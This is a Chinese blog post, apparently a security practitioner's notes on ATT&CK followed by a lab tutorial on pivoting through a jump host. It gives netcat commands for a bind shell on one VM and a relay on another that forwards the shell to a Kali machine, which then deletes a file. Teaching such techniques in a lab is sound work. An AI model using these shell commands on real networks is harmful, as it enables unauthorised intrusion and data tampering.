问渠哪得清如许,为有源头活水来。今天花了大半天时间把ATT&CK12大战略100大战术草草的过了一遍,发现落地还是很困难,一眼看不到希望。下午换了一个局点,发现专家系统的适应性很差,参数还要重新调,很难过。现在最关心的是:
- 如何从海量主机中挑选最可能中毒的主机?
我的解决方案是通过做主机的威胁量化排名,遇到的问题是调参麻烦
- 如何证明安全事件靠谱?
我的解决方案是通过做主机的行为基线,这周要做出demo
带你了解「安全评估与渗透测试」
作者 ailx10
在企业里网络管控是很严格的,有很多堡垒机隔离了内网的不同主机,今天的主题是「内网代理」,我们的kali小黑兄弟,想要去ubuntu16拿点数据,但是发现路由不通。幸运的是,小黑可以访问ubuntu18,而ubuntu18又可以访问ubuntu16,这里的ubuntu18就相当于堡垒机,那么聪明你能帮助小黑建立到底ubuntu16的shell控制通道吗?
基本环境如下:
- kali rolling:192.168.160.140
- ubuntu18:192.168.160.137
- ubuntu16:192.168.160.136
组网环境如下:
- 实线表示网络联通
- 虚线表示网络断开
第一步:在kali rolling上操作
- 这里监听自己的23333端口就好了
- 完成第三步,就会自动获得ubuntu16的shell
- 这里可以看到,ubuntu16上有「小黑的缺点.txt」隐私文档
nc -lvp 23333
第二步:在ubuntu16上操作
- 这里就是将ubuntu16的shell通过23333端口弹出去
- 不管谁访问ubuntu16的23333端口,都将获得shell
nc -lvp 23333 -e /bin/sh
第三步:在ubuntu18上操作
- 这里首先获得ubuntu16的shell
- 然后将shell重定向到kali rolling上去
- 这个时候,小黑在kali rolling上就拿到了ubuntu16的shell啦
- 于是,小黑轻松的删除了「小黑的缺点.txt」
nc -v 192.168.160.136 23333 -c "nc -v 192.168.160.140 23333"
本篇完~
本文暂时没有评论,来添加一个吧(●'◡'●)